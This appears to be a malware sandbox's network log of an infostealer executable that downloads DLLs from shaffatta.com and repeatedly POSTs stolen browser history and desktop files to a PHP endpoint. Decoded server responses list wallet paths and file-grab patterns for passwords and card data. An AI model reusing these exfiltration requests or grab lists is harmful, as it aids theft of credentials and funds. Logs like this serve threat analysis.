2024-05-03 00:08:42 UTC	16384	IN	Data Raw: e5 b8 51 00 00 00 5d c3 cc cc cc cc cc cc 55 89 e5 53 57 56 8b 7d 10 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe Data Ascii: Q]USWV}7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4
2024-05-03 00:08:42 UTC	16384	IN	Data Raw: c3 b8 00 08 00 00 5d c3 b8 00 10 00 00 5d c3 b8 00 20 00 00 5d c3 b8 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c Data Ascii: ]] ]@]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!C
2024-05-03 00:08:42 UTC	16384	IN	Data Raw: 83 c6 ff 0f 85 d5 fe ff ff eb 12 0f 1f 00 83 ff 11 0f 84 d8 fe ff ff eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49746	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:43 UTC	97	OUT	GET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1 Host: shaffatta.com Cache-Control: no-cache
2024-05-03 00:08:43 UTC	285	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:43 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: close Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT ETag: "13bf0-5e7ea271b0900" Accept-Ranges: bytes X-Served-By: shaffatta.com
2024-05-03 00:08:43 UTC	16099	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-05-03 00:08:43 UTC	16384	IN	Data Raw: 2b f8 75 18 0f b6 7e 01 0f b6 42 01 2b f8 75 0c 0f b6 7e 02 0f b6 42 02 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f Data Ascii: +u~B+u~B+t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3
2024-05-03 00:08:44 UTC	16384	IN	Data Raw: 8d 4d f8 e8 ce f7 ff ff 83 3d a8 f2 00 10 01 75 11 83 3d a4 f2 00 10 00 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 Data Ascii: M=u=uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPj
2024-05-03 00:08:44 UTC	16384	IN	Data Raw: 90 f2 00 10 a8 01 74 06 81 c9 00 20 00 00 83 f8 18 0f 8d 16 02 00 00 8b d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 Data Ascii: t ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJC
2024-05-03 00:08:44 UTC	15629	IN	Data Raw: 81 48 76 d4 fa 35 9f 1e 1f d6 82 00 4c 28 61 99 31 a8 44 97 46 8b 9a 4e 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 Data Ascii: Hv5L(a1DFNT@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Cor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49747	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:44 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG Host: shaffatta.com Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:44 UTC	1067	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 4e 62 33 70 70 62 47 78 68 49 45 5a 70 63 Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="file_name"aGlzdG9yeVxNb3ppbGxhIEZpc
2024-05-03 00:08:45 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49748	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:45 UTC	200	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC Host: shaffatta.com Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:45 UTC	267	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="message"wallets------GCGHJEBGHJKE
2024-05-03 00:08:46 UTC	207	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: close Vary: Accept-Encoding X-Served-By: shaffatta.com
2024-05-03 00:08:46 UTC	2408	IN	Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49749	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:46 UTC	200	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC Host: shaffatta.com Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:46 UTC	265	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="message"files------IDGHDGIDAKEBAA
2024-05-03 00:08:47 UTC	206	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 908 Connection: close Vary: Accept-Encoding X-Served-By: shaffatta.com
2024-05-03 00:08:47 UTC	908	IN	Data Raw: 5a 47 56 7a 61 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 6a 62 32 52 6c 63 79 6f 73 4b 6a 4a 6d 59 53 6f 73 4b 6d 6c 69 59 57 34 71 4c 43 70 6a 59 58 4a 6b 63 79 6f 73 4b 6d 4a 68 62 6d 74 7a 4b 69 77 71 59 33 5a 32 4b 69 77 71 59 33 5a 6a 4b 69 77 71 59 57 4e 6a 62 33 56 75 64 43 6f 73 4b 6d 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 4b 69 77 71 59 6d 6c 30 59 32 39 70 62 69 6f 73 4b 6d 56 30 61 47 56 79 5a 58 56 74 4b 69 77 71 59 6d 46 75 61 79 6f 73 4b 6e 42 68 63 33 4e 33 62 33 4a 6b 4b 69 77 71 64 32 46 73 62 47 56 30 4b 69 77 71 4c 6e 52 34 64 43 77 71 4c 6d 52 76 59 79 77 71 63 32 56 6a 63 6d 56 30 4b 69 77 71 4c 6e 4a 30 5a 69 77 67 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 43 77 71 4c 6e 68 73 63 79 6f 73 4b 69 35 30 65 48 51 Data Ascii: ZGVza3wlREVTS1RPUCVcfCpjb2RlcyosKjJmYSosKmliYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosKmNyZWRlbnRpYWxzKiwqYml0Y29pbiosKmV0aGVyZXVtKiwqYmFuayosKnBhc3N3b3JkKiwqd2FsbGV0KiwqLnR4dCwqLmRvYywqc2VjcmV0KiwqLnJ0ZiwgKi5kb2N4LCoueGxzeCwqLnhscyosKi50eHQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49750	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:47 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:47 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 46 52 55 64 58 57 46 56 49 56 Data Ascii: ------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xFRUdXWFVIV
2024-05-03 00:08:47 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49751	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:48 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:48 UTC	1743	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 46 52 55 64 58 57 46 56 49 56 Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xFRUdXWFVIV
2024-05-03 00:08:48 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49752	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:49 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHC Host: shaffatta.com Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:49 UTC	1759	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 46 52 6b 39 5a 52 6b 4a 50 54 Data Ascii: ------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xFRk9ZRkJPT
2024-05-03 00:08:49 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49753	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:50 UTC	201	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH Host: shaffatta.com Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
